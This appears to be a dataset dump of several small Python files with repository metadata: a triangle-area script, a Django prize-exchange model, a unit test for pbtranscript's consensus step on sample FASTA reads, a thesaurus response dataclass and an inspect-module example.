ChristianSalas1234567/salas-yupanqui
36fdbe3ebc51cd73f62870fcc8b646ad98133ae7
[ "Apache-2.0" ]
null
null
null
Areatriangulo.py
ChristianSalas1234567/salas-yupanqui
36fdbe3ebc51cd73f62870fcc8b646ad98133ae7
[ "Apache-2.0" ]
null
null
null
#variables de entrada print("area del triangulo") #datos de entrada B=int(input("ingrese base:")) H=int(input("ingrese haltura:")) #proceso area=(B*H)/2 #datos de salida print("el area es: ", area)
21.888889
32
0.71066
33
197
4.242424
0.606061
0.128571
0.214286
0
0
0
0
0
0
0
0
0.005714
0.111675
197
9
33
21.888889
0.794286
0.294416
0
0
0
0
0.433824
0
0
0
0
0
0
1
0
false
0
0
0
0
0.4
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
34e3c30f1eecc4a83cc074f6ae2e470a42d8d132
1,058
py
Python
cride/users/models/exchanges.py
albertoaldanar/betmatcherAPI
c0590025efd79f4e489f9c9433b17554ea6ba23f
[ "MIT" ]
null
null
null
cride/users/models/exchanges.py
albertoaldanar/betmatcherAPI
c0590025efd79f4e489f9c9433b17554ea6ba23f
[ "MIT" ]
7
2020-06-05T20:53:27.000Z
2022-03-11T23:47:12.000Z
cride/users/models/exchanges.py
albertoaldanar/betmatcherAPI
c0590025efd79f4e489f9c9433b17554ea6ba23f
[ "MIT" ]
null
null
null
from django.db import models #Utilities from cride.utils.models import BetmatcherModel class Exchange(BetmatcherModel): user = models.ForeignKey( "users.User", on_delete = models.CASCADE, related_name = "user" ) prize = models.ForeignKey( "users.Prize", on_delete = models.CASCADE, related_name = "prize" ) adress = models.CharField(max_length = 60, blank = True, null = True) phone = models.CharField(max_length = 25, blank = True, null = True) email = models.CharField(max_length = 25, blank = True, null = True) cp = models.CharField(max_length = 25, blank = True, null = True) country = models.CharField(max_length = 25, blank = True, null = True) city = models.CharField(max_length = 25, blank = True, null = True) full_name = models.CharField(max_length = 55, blank = True, null = True) state = models.CharField(max_length = 25, blank = True, null = True) date = models.DateTimeField( "event_date", help_text = "Date of the event" ) def __str__(self): return self.user.username
28.594595
74
0.6862
138
1,058
5.123188
0.355072
0.169731
0.203678
0.27157
0.455446
0.455446
0.364922
0.364922
0.364922
0
0
0.018868
0.198488
1,058
36
75
29.388889
0.814858
0.008507
0
0.074074
0
0
0.054441
0
0
0
0
0
0
1
0.037037
false
0
0.074074
0.037037
0.592593
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
34e7cf6e1775685d6271aef6702b1730ac2e95bc
1,956
py
Python
tests/unit/test_bad_cluster.py
ylipacbio/pbtranscript
6b4ef164f191ffd4201feb62b951d9eeac3315b6
[ "BSD-3-Clause" ]
null
null
null
tests/unit/test_bad_cluster.py
ylipacbio/pbtranscript
6b4ef164f191ffd4201feb62b951d9eeac3315b6
[ "BSD-3-Clause" ]
null
null
null
tests/unit/test_bad_cluster.py
ylipacbio/pbtranscript
6b4ef164f191ffd4201feb62b951d9eeac3315b6
[ "BSD-3-Clause" ]
1
2021-02-26T10:08:09.000Z
2021-02-26T10:08:09.000Z
# XXX verification for bug 30828 - runs ice_pbdagcon on a spurious cluster # and checks that it discards the resulting all-N consensus sequence import subprocess import tempfile import unittest import os.path as op from pbcore.io import FastaReader CLUSTER_FA = """\ >m54007_151222_230824/47383194/334_64_CCS CATTGAAGACGTCCACCTCAACGCTATGAACGTTAGTTGAGACAATGTTAAAGCAAACGACAACGTCATTGTGATCTACATACACAGTGGATGGTTAGCGTAAACATGGTGGAACGTACTTTGACTGCGCTGCAAGAAATGGTTGGGTCGATCGTAATGCTAGTCGTTACATCGGAACAAGCCAAAACAAAATCATTCGCTGGATTTAGACCTACTGCACGACGACGTCGACACAAGACATTCTTGAAAGGTAATTGACGTGGACGTTTC >m54007_151222_230824/28640158/287_60_CCS CAAACGACAACGTCATTGTGATCTACATACACAGTGGATGGTTAGGCGTAAACATGGTGGGAACGTACTTTGACTGCGCTGCAAGAAATGGGTTGGGTCGATCGTAATGCTAGTCGTTACATCGGAACAAGCCAAAAAACAAACATCATTCGCTGGATTTAGACTACTACTGCACGACCGACGTCGACACAAGACATTCTCTGAAAGGTAATTGACGTGGACGTTTC >m54007_151222_230824/49611437/382_58_CCS ACTGAACTACGGGTCAGCTTCCCCATTTGAAGTCATGTAGTGGTTGTCTACTTTTTCATTGAGACGTCCACCTCAACGCTATGAACGTTAGTTGAGACAATGTTAAAGCAAACGACAACGTCATTGTGATCTACATACACAGTGGATGGTTAGCGTAAACATGGTGGAACGTACTTTGACTGCGCTGCAAGAAATGGTGTGGGTCGATCGTAATGCTAGTCGTTACATCGGAACAAGCCAAAACAAAATCATTCGCTGGATTTAGACCTACTGCACGACGACGTCGACACAAGACATTCTTGAAAGGTAATTGACGTGGACGTT""" class TestBadCluster(unittest.TestCase): def setUp(self): self.cluster_fa = tempfile.NamedTemporaryFile(suffix=".fasta").name with open(self.cluster_fa, "w") as fa_out: fa_out.write(CLUSTER_FA) def test_ice_pbdagcon_bad_cluster(self): out_fa = tempfile.NamedTemporaryFile(suffix=".fasta").name prefix = op.splitext(out_fa)[0] args = [ "python", "-m", "pbtranscript.ice_pbdagcon", self.cluster_fa, prefix, "c5006" ] assert subprocess.call(args) == 0 with FastaReader(out_fa) as fa_out: self.assertEqual(len([rec for rec in fa_out]), 0) if __name__ == "__main__": unittest.main()
44.454545
327
0.812883
152
1,956
10.210526
0.559211
0.028995
0.034794
0.043814
0.055412
0.055412
0
0
0
0
0
0.059965
0.130368
1,956
43
328
45.488372
0.85244
0.071063
0
0
0
0
0.557088
0.534473
0
0
0
0
0.064516
1
0.064516
false
0
0.16129
0
0.258065
0
0
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
34f18dca2b35de2acae03f31c1e789e6be8e839f
756
py
Python
mwthesaurus/model.py
PederHA/mwthesaurus
c58d9bdf82fce906c8a2c908b803b2a9db4bc0a2
[ "MIT" ]
null
null
null
mwthesaurus/model.py
PederHA/mwthesaurus
c58d9bdf82fce906c8a2c908b803b2a9db4bc0a2
[ "MIT" ]
null
null
null
mwthesaurus/model.py
PederHA/mwthesaurus
c58d9bdf82fce906c8a2c908b803b2a9db4bc0a2
[ "MIT" ]
null
null
null
from dataclasses import dataclass, field
from typing import List
from itertools import chain


@dataclass
class Word:
    """A thesaurus entry: a headword plus its definitions and relations.

    Attributes:
        word: the headword (taken from ``meta.id`` in the API response).
        wordtype: part of speech (the API's ``fl`` field).
        shortdef: short definitions for the word.
        synonyms: flattened list of synonyms across all sense groups.
        antonyms: flattened list of antonyms across all sense groups.
        stems: all stem forms of the word.
    """
    word: str
    wordtype: str
    shortdef: List[str] = field(default_factory=list)
    synonyms: List[str] = field(default_factory=list)
    antonyms: List[str] = field(default_factory=list)
    stems: List[str] = field(default_factory=list)

    @classmethod
    def from_response(cls, r: dict) -> "Word":
        """Build a ``Word`` from one raw API response entry.

        The previous implementation used ``cls.__new__(cls)`` and mutated
        attributes directly, silently bypassing the dataclass-generated
        ``__init__`` (and with it the field defaults and any future
        validation). Calling the constructor is equivalent and safer.

        Args:
            r: one entry of the Merriam-Webster thesaurus JSON response.

        Raises:
            KeyError: if a required field is missing from *r*.
        """
        meta = r["meta"]
        return cls(
            word=meta["id"],
            wordtype=r["fl"],
            shortdef=r["shortdef"],
            # syns/ants arrive as a list of per-sense lists; flatten them.
            synonyms=list(chain.from_iterable(meta["syns"])),
            antonyms=list(chain.from_iterable(meta["ants"])),
            stems=meta["stems"],
        )
30.24
67
0.640212
98
756
4.826531
0.357143
0.059197
0.10148
0.160677
0.363636
0.363636
0
0
0
0
0
0
0.218254
756
24
68
31.5
0.800338
0
0
0
0
0
0.054233
0
0
0
0
0
0
1
0.047619
false
0
0.142857
0
0.571429
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
2
34f87e0983bc87b776a41bf8fa6bd6191f64154d
437
py
Python
exemplo_47_inspect.py
alef123vinicius/Estudo_python
30b121d611f94eb5df9fbb41ef7279546143221b
[ "Apache-2.0" ]
null
null
null
exemplo_47_inspect.py
alef123vinicius/Estudo_python
30b121d611f94eb5df9fbb41ef7279546143221b
[ "Apache-2.0" ]
null
null
null
exemplo_47_inspect.py
alef123vinicius/Estudo_python
30b121d611f94eb5df9fbb41ef7279546143221b
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 16 15:35:53 2021

@author: alef
"""

import os.path
# inspect: the friendly introspection module
import inspect

print('Objeto: ', inspect.getmodule(os.path))
print('Classe?', inspect.isclass(str))

# List every function that exists in os.path
print('Membros: ')
function_names = [member_name
                  for member_name, member in inspect.getmembers(os.path)
                  if inspect.isfunction(member)]
for member_name in function_names:
    print(member_name)
17.48
48
0.681922
63
437
4.730159
0.746032
0.080537
0.073826
0
0
0
0
0
0
0
0
0.038674
0.171625
437
25
49
17.48
0.78453
0.393593
0
0
0
0
0.094118
0
0
0
0
0
0
1
0
true
0
0.25
0
0.25
0.5
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
1
0
2